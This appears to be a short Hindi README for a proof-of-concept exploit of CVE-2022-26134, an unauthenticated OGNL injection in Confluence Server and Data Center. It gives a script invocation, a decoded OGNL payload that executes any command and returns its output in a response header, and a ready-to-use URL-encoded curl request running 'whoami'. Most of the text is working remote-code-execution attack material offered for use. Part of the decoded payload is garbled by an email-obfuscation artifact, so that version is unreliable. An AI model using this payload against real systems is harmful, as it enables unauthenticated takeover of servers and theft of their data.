
CVE-2022-26134 Confluence OGNL Injection POC
Confluence Server और Data Center के प्रभावित संस्करणों में,
एक OGNL इंजेक्शन भेद्यता मौजूद है, जो एक बिना प्रमाणीकरण वाले हमलावर को
Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।
python3 confluence.py -u http://127.0.0.1 -c whoami चलाएँURL-डिकोडेड पेलोड:
/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
यह कमांड को लक्षित सर्वर पर निष्पादित करता है और आउटपुट को X-Cmd-Response हेडर के अंदर वापस भेजता है।
आप curl का भी उपयोग कर सकते हैं:
curl -kI "http://127.0.0.1/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"